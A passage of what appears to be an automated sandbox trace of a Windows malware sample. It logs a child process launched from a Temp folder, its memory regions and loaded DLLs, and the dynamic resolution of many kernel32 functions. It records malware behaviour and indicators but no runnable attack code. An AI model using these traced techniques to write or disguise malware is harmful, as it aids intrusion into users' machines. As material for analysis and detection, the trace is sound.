[157]=0x0, [158]=0x0, [159]=0x0, [160]=0x0, [161]=0x0, [162]=0x0, [163]=0x0, [164]=0x0, [165]=0x0, [166]=0x0, [167]=0x0, [168]=0x0, [169]=0x0, [170]=0x0, [171]=0x0, [172]=0x0, [173]=0x0, [174]=0x0, [175]=0x0, [176]=0x0, [177]=0x0, [178]=0x0, [179]=0x0, [180]=0x0, [181]=0x0, [182]=0x0, [183]=0x0, [184]=0x0, [185]=0x0, [186]=0x0, [187]=0x0, [188]=0x0, [189]=0x0, [190]=0x0, [191]=0x0, [192]=0x0, [193]=0x0, [194]=0x0, [195]=0x0, [196]=0x0, [197]=0x0, [198]=0x0, [199]=0x0, [200]=0x0, [201]=0x0, [202]=0x0, [203]=0x0, [204]=0x0, [205]=0x0, [206]=0x0, [207]=0x0, [208]=0x0, [209]=0x0, [210]=0x0, 
[211]=0x0, [212]=0x0, [213]=0x0, [214]=0x0, [215]=0x0, [216]=0x0, [217]=0x0, [218]=0x0, [219]=0x0, [220]=0x0, [221]=0x0, [222]=0x0, [223]=0x0, [224]=0x0, [225]=0x0, [226]=0x0, [227]=0x0, [228]=0x0, [229]=0x0, [230]=0x0, [231]=0x0, [232]=0x0, [233]=0x0, [234]=0x0, [235]=0x0, [236]=0x0, [237]=0x0, [238]=0x0, [239]=0x0, [240]=0x0, [241]=0x0, [242]=0x0, [243]=0x0, [244]=0x0, [245]=0x0, [246]=0x0, [247]=0x0, [248]=0x0, [249]=0x0, [250]=0x0, [251]=0x0, [252]=0x0, [253]=0x0, [254]=0x0, [255]=0x0, [256]=0x0, [257]=0x0, [258]=0x0, [259]=0x0, [260]=0x0, [261]=0x0, [262]=0x0, [263]=0x0, [264]=0x0, [265]=0x0, [266]=0x0, [267]=0x0, [268]=0x0, [269]=0x0, [270]=0x0, [271]=0x0, [272]=0x0, [273]=0x0, [274]=0x0, [275]=0x0, [276]=0x0, [277]=0x0, [278]=0x0, [279]=0x0, [280]=0x0, [281]=0x0, [282]=0x0, [283]=0x0, [284]=0x0, [285]=0x0, [286]=0x0, [287]=0x0, [288]=0x0, [289]=0x0, [290]=0x0, [291]=0x0, [292]=0x0, [293]=0x0, [294]=0x0, [295]=0x0, [296]=0x0, [297]=0x0, [298]=0x0, [299]=0x0, [300]=0x0, [301]=0x0, [302]=0x0, [303]=0x0, [304]=0x0, [305]=0x0, [306]=0x0, [307]=0x0, [308]=0x0, [309]=0x0, [310]=0x0, [311]=0x0, [312]=0x0, [313]=0x0, [314]=0x0, [315]=0x0, [316]=0x0, [317]=0x0, [318]=0x0, [319]=0x0, [320]=0x0, [321]=0x0, [322]=0x0, [323]=0x0, [324]=0x0, [325]=0x0, [326]=0x0, [327]=0x0, [328]=0x0, [329]=0x0, [330]=0x0, [331]=0x0, [332]=0x0, [333]=0x0, [334]=0x0, [335]=0x0, [336]=0x0, [337]=0x0, [338]=0x0, [339]=0x0, [340]=0x0, [341]=0x0, [342]=0x0, [343]=0x0, [344]=0x0, [345]=0x0, [346]=0x0, [347]=0x0, [348]=0x0, [349]=0x0, [350]=0x0, [351]=0x0, [352]=0x0, [353]=0x0, [354]=0x0, [355]=0x0, [356]=0x0, [357]=0x0, [358]=0x0, [359]=0x0, [360]=0x0, [361]=0x0, [362]=0x0, [363]=0x0, [364]=0x0, [365]=0x0, [366]=0x0, [367]=0x0, [368]=0x0, [369]=0x0, [370]=0x0, [371]=0x0, [372]=0x0, [373]=0x0, [374]=0x0, [375]=0x0, [376]=0x0, [377]=0x0, [378]=0x0, [379]=0x0, [380]=0x0, [381]=0x0, [382]=0x0, [383]=0x0, [384]=0x0, [385]=0x0, [386]=0x0, [387]=0x0, [388]=0x0, [389]=0x0, [390]=0x0, [391]=0x0, 
[392]=0x0, [393]=0x0, [394]=0x0, [395]=0x0, [396]=0x0, [397]=0x0, [398]=0x0, [399]=0x0, [400]=0x0, [401]=0x0, [402]=0x0, [403]=0x0, [404]=0x0, [405]=0x0, [406]=0x0, [407]=0x0, [408]=0x0, [409]=0x0, [410]=0x0, [411]=0x0, [412]=0x0, [413]=0x0, [414]=0x0, [415]=0x0, [416]=0x0, [417]=0x0, [418]=0x0, [419]=0x0, [420]=0x0, [421]=0x0, [422]=0x0, [423]=0x0, [424]=0x0, [425]=0x0, [426]=0x0, [427]=0x0, [428]=0x0, [429]=0x0, [430]=0x0, [431]=0x0, [432]=0x0, [433]=0x0, [434]=0x0, [435]=0x0, [436]=0x0, [437]=0x0, [438]=0x0, [439]=0x0, [440]=0x0, [441]=0x0, [442]=0x0, [443]=0x0, [444]=0x0, [445]=0x0, [446]=0x0, [447]=0x0, [448]=0x0, [449]=0x0, [450]=0x0, [451]=0x0, [452]=0x0, [453]=0x0, [454]=0x0, [455]=0x0, [456]=0x0, [457]=0x0, [458]=0x0, [459]=0x0, [460]=0x0, [461]=0x0, [462]=0x0, [463]=0x0, [464]=0x0, [465]=0x0, [466]=0x0, [467]=0x0, [468]=0x0, [469]=0x0, [470]=0x0, [471]=0x0, [472]=0x0, [473]=0x0, [474]=0x0, [475]=0x0, [476]=0x0, [477]=0x0, [478]=0x0, [479]=0x0, [480]=0x0, [481]=0x0, [482]=0x0, [483]=0x0, [484]=0x0, [485]=0x0, [486]=0x0, [487]=0x0, [488]=0x0, [489]=0x0, [490]=0x0, [491]=0x0, [492]=0x0, [493]=0x0, [494]=0x0, [495]=0x0, [496]=0x0, [497]=0x0, [498]=0x0, [499]=0x0, [500]=0x0, [501]=0x0, [502]=0x0, [503]=0x0, [504]=0x0, [505]=0x0, [506]=0x0, [507]=0x0, [508]=0x0, [509]=0x0, [510]=0x0, [511]=0x0))) returned 1 [0115.118] ResumeThread (hThread=0x48) returned 0x1 [0115.118] CloseHandle (hObject=0x48) returned 1 [0115.118] CloseHandle (hObject=0x4c) returned 1 [0115.118] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0115.119] GetModuleHandleW (lpModuleName="mscoree.dll") returned 0x0 [0115.119] ExitProcess (uExitCode=0x0) Process: id = "49" image_name = "hvgo9ckx.exe" filename = "c:\\users\\eebsym5\\appdata\\local\\temp\\hvgo9ckx.exe" page_root = "0x7ea16780" os_pid = "0xde8" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "48" os_parent_pid = "0xdcc" cmd_line = 
"\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\hvGO9ckx.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"FIXLNKVIEW\" \"60000\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7780 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7781 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 7782 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 7783 start_va = 0x400000 end_va = 0x51cfff entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 7784 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7785 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7786 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7787 start_va = 0x7ffd5000 end_va = 0x7ffd5fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd5000" filename = "" Region: id = 
7788 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 7855 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 7856 start_va = 0x140000 end_va = 0x1a6fff entry_point = 0x140000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 7857 start_va = 0x1b0000 end_va = 0x277fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 7858 start_va = 0x340000 end_va = 0x34ffff entry_point = 0x0 region_type = private name = "private_0x0000000000340000" filename = "" Region: id = 7859 start_va = 0x6f0000 end_va = 0x7effff entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 7860 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 7861 start_va = 0x75680000 end_va = 0x75720fff entry_point = 0x75680000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 7862 start_va = 0x75830000 end_va = 0x76479fff entry_point = 0x75830000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 7863 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 7864 start_va = 0x76750000 end_va = 0x768abfff entry_point = 0x76750000 region_type = mapped_file name = "ole32.dll" 
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 7865 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 7866 start_va = 0x769f0000 end_va = 0x76a8ffff entry_point = 0x769f0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 7867 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 7868 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 7869 start_va = 0x76c10000 end_va = 0x76c9efff entry_point = 0x76c10000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 7870 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 7871 start_va = 0x76e10000 end_va = 0x76e66fff entry_point = 0x76e10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 7872 start_va = 0x773c0000 end_va = 0x773d8fff entry_point = 0x773c0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 7873 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 
0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 7874 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 7875 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 7876 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 7964 start_va = 0x20000 end_va = 0x20fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 7965 start_va = 0x280000 end_va = 0x280fff entry_point = 0x0 region_type = private name = "private_0x0000000000280000" filename = "" Region: id = 7966 start_va = 0x520000 end_va = 0x620fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000520000" filename = "" Region: id = 7967 start_va = 0x7f0000 end_va = 0x13effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000007f0000" filename = "" Region: id = 7968 start_va = 0x13f0000 end_va = 0x152ffff entry_point = 0x0 region_type = private name = "private_0x00000000013f0000" filename = "" Region: id = 7969 start_va = 0x77380000 end_va = 0x773b4fff entry_point = 0x77380000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 7970 start_va = 0x75810000 end_va = 0x75815fff entry_point = 0x75810000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 7971 start_va = 0x1530000 end_va = 
0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 7977 start_va = 0x16c0000 end_va = 0x198efff entry_point = 0x16c0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 7978 start_va = 0x290000 end_va = 0x290fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000290000" filename = "" Region: id = 7979 start_va = 0x75380000 end_va = 0x7538afff entry_point = 0x75380000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 7981 start_va = 0x2a0000 end_va = 0x2b0fff entry_point = 0x2a0000 region_type = mapped_file name = "c_1251.nls" filename = "\\Windows\\System32\\C_1251.NLS" (normalized: "c:\\windows\\system32\\c_1251.nls") Region: id = 7982 start_va = 0x1530000 end_va = 0x162ffff entry_point = 0x0 region_type = private name = "private_0x0000000001530000" filename = "" Region: id = 7983 start_va = 0x1680000 end_va = 0x16bffff entry_point = 0x0 region_type = private name = "private_0x0000000001680000" filename = "" Region: id = 7984 start_va = 0x74e10000 end_va = 0x74e4bfff entry_point = 0x74e10000 region_type = mapped_file name = "mswsock.dll" filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll") Region: id = 7985 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 7986 start_va = 0x74cd0000 end_va = 0x74d13fff entry_point = 0x74cd0000 region_type = mapped_file name = "dnsapi.dll" filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll") Region: id = 7987 start_va = 0x350000 end_va = 0x3fffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000350000" filename = "" Region: id = 7988 start_va = 0x737d0000 end_va = 0x737ebfff entry_point = 0x737d0000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 7989 start_va = 0x737c0000 end_va = 0x737c6fff entry_point = 0x737c0000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 8014 start_va = 0x1990000 end_va = 0x1a8ffff entry_point = 0x0 region_type = private name = "private_0x0000000001990000" filename = "" Region: id = 8015 start_va = 0x704a0000 end_va = 0x704a5fff entry_point = 0x704a0000 region_type = mapped_file name = "rasadhlp.dll" filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll") Region: id = 8016 start_va = 0x7ffdd000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdd000" filename = "" Thread: id = 79 os_tid = 0xdec [0115.482] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0115.482] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0115.482] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQueryEx") returned 0x76944e42 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VirtualProtect") returned 0x76952341 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VerSetConditionMask") returned 0x77253030 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="VerifyVersionInfoW") returned 
0x76950e91 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="TerminateProcess") returned 0x76952331 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SuspendThread") returned 0x76970ca9 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SizeofResource") returned 0x76953e7f [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadPriority") returned 0x76954815 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SetLastError") returned 0x7695bb08 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SetFilePointer") returned 0x7695db36 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SetEvent") returned 0x7695bccc [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="SetEndOfFile") returned 0x76952319 [0115.483] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="ResetEvent") returned 0x7695bcb4 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="ReleaseMutex") returned 0x7695ba72 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="ReadFile") returned 0x769596fb [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceFrequency") returned 0x769522a7 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="OpenProcess") returned 0x769559d7 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="OpenMutexW") returned 0x7696992d [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LockResource") returned 0x7694fd29 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LocalFree") returned 0x7695ca64 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LocalAlloc") returned 0x76963363 
[0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LoadResource") returned 0x7695984d [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryW") returned 0x76963c01 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="LeaveCriticalSection") returned 0x77277760 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="InitializeCriticalSection") returned 0x7728a149 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="HeapFree") returned 0x7695bbd0 [0115.484] GetProcAddress (hModule=0x76910000, lpProcName="HeapDestroy") returned 0x76952301 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="HeapCreate") returned 0x76963ea2 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="HeapAlloc") returned 0x77282dd6 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetVersionExW") returned 0x76953b1a [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadTimes") returned 0x76945bfd [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadPriority") returned 0x76959147 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadLocale") returned 0x7695153c [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemTimes") returned 0x7696d83a [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetStdHandle") returned 0x76961e46 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetShortPathNameW") returned 0x76950bbc [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetProcessTimes") returned 0x7694f626 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") 
returned 0x76963c26 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetLocalTime") returned 0x7695a90e [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0115.485] GetProcAddress (hModule=0x76910000, lpProcName="GetFullPathNameW") returned 0x76964543 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetFileAttributesW") returned 0x769664ff [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetExitCodeThread") returned 0x76946ddd [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetDriveTypeW") returned 0x76963be6 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetDiskFreeSpaceW") returned 0x76943530 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetDateFormatW") returned 0x7695afab [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThread") returned 0x76963351 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcessId") returned 0x7695cac4 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentProcess") returned 0x7695cdcf [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetComputerNameA") returned 0x76946ba9 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfoExW") returned 0x76948b1b [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetCPInfo") returned 0x76961e2e [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="FreeResource") returned 0x7694f1bd [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="InterlockedCompareExchange") returned 0x7695bb92 [0115.486] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0115.486] GetProcAddress 
(hModule=0x76910000, lpProcName="FormatMessageW") returned 0x769554a3 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="FindResourceW") returned 0x76953e61 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="FindNextFileW") returned 0x7695963a [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="FindFirstFileW") returned 0x769653b2 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="FindClose") returned 0x76960e62 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="ExpandEnvironmentStringsW") returned 0x76954680 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="EnumSystemLocalesW") returned 0x7699f3df [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="EnumCalendarInfoW") returned 0x7699f38f [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="EnterCriticalSection") returned 0x772777a0 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="DeleteFileW") returned 0x76950f62 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessW") returned 0x7691204d [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CreateMutexW") returned 0x76952aee [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileW") returned 0x7695cc56 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CreateEventW") returned 0x76963386 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CreateDirectoryW") returned 0x76953925 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileW") returned 0x769467c3 [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0115.487] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0115.487] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0115.488] LoadLibraryA 
(lpLibFileName="KERNEL32.DLL") returned 0x76910000 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="Sleep") returned 0x7695ba46 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="lstrlenW") returned 0x7695d9e8 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="VirtualQuery") returned 0x769676d6 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="QueryPerformanceCounter") returned 0x7695bb9f [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetTickCount") returned 0x7695ba60 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemInfo") returned 0x76963728 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetVersion") returned 0x7695154e [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="CompareStringW") returned 0x76959bee [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="IsValidLocale") returned 0x76953de4 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadLocale") returned 0x769788e6 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetSystemDefaultUILanguage") returned 0x7694731d [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetUserDefaultUILanguage") returned 0x769522ef [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="GetLocaleInfoW") returned 0x76966596 [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="WideCharToMultiByte") returned 0x7696450e [0115.488] GetProcAddress (hModule=0x76910000, lpProcName="MultiByteToWideChar") returned 0x7696452b [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetACP") returned 0x769639aa [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="LoadLibraryExW") returned 0x76954775 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetStartupInfoW") returned 0x76963891 [0115.489] 
GetProcAddress (hModule=0x76910000, lpProcName="GetProcAddress") returned 0x769633d3 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleHandleW") returned 0x7696374d [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameW") returned 0x76963c26 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineW") returned 0x7696679e [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="FreeLibrary") returned 0x7695d9d0 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetLastError") returned 0x7695bf00 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="UnhandledExceptionFilter") returned 0x7696ed38 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="RtlUnwind") returned 0x76947f70 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="RaiseException") returned 0x7694eb60 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="ExitProcess") returned 0x7696214f [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="ExitThread") returned 0x7725f611 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="SwitchToThread") returned 0x7694eb24 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="GetCurrentThreadId") returned 0x7695bb80 [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="CreateThread") returned 0x7696375d [0115.489] GetProcAddress (hModule=0x76910000, lpProcName="DeleteCriticalSection") returned 0x77289ac5 [0115.489] 